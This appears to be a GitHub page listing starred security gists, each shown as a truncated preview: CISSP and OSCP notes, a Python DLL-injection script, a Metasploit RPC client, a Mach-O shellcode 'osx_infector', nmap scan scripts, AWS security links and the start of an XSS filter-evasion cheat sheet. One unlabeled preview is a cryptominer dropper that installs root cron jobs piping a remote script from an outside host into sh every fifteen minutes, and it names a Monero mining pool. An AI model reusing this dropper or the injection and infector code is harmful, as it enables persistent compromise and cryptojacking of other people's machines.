Namish namishelex01

@duongkai
duongkai / lecture_note.md
Last active July 30, 2018 05:57
CISSP lectures note

Day 2

Chapter 2. Asset

Change management

  • Change Management

    • Create Change Request
    • Submit to CAB (Change advisory board)
    • Review the CR and impact
    • Create rollback plan
  • Hacking lifecycle

@RobinDavid
RobinDavid / dll_injection.py
Created February 25, 2014 17:49
Sample dll injection (Gray Hat Python)
import sys
from ctypes import *
PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
kernel32 = windll.kernel32 #Get the wanted dll
pid = sys.argv[1] #Gather sent parameters
@carnal0wnage
carnal0wnage / msgrpc_ssh_version.py
Last active April 19, 2020 14:22
Python script to connect to a Metasploit msgrpc instance, set up and run an auxiliary module.
#!/usr/bin/env python
import sys
import msfrpc
import time
if __name__ == '__main__':
    # Create a new instance of the Msfrpc client with the default options
    client = msfrpc.Msfrpc({})
    # Login to the msf server using the password "abc123"

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@secretsquirrel
secretsquirrel / osx_infector.py
Last active March 31, 2021 19:33
From Shmoocon infection demo
import os
import struct
import shutil
import subprocess
class macho_intel32_shellcode():
    """
    Mach-O Intel x32 shellcode class
    """
@chanj
chanj / AWS Security Resources
Last active June 21, 2021 09:49
AWS Security Resources
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/crontabs/root
# ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
@coffeegist
coffeegist / nmap-tcp-full.sh
Last active May 23, 2022 20:20
OSCP nmap scripts
if [ "$#" -ne 3 ]; then
echo "Usage: nmap-tcp-full.sh <TCP-QUICK-RESULTS.XML> <TARGET> <OUTPUT-FILENAME>"
exit 1
fi
nmap -nvv -Pn -sSV -T1 -p$(cat $1 | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA $3 $2
@carnal0wnage
carnal0wnage / DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Last active September 26, 2022 06:00
Links from Chris Gates/Ken Johnson DevOOPS RSA 17 presentation
@namishelex01
namishelex01 / xss-owasp-cheatsheet
Last active October 17, 2022 21:11 — forked from sseffa/xss-owasp-cheatsheet
xss-owasp-cheatsheet
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}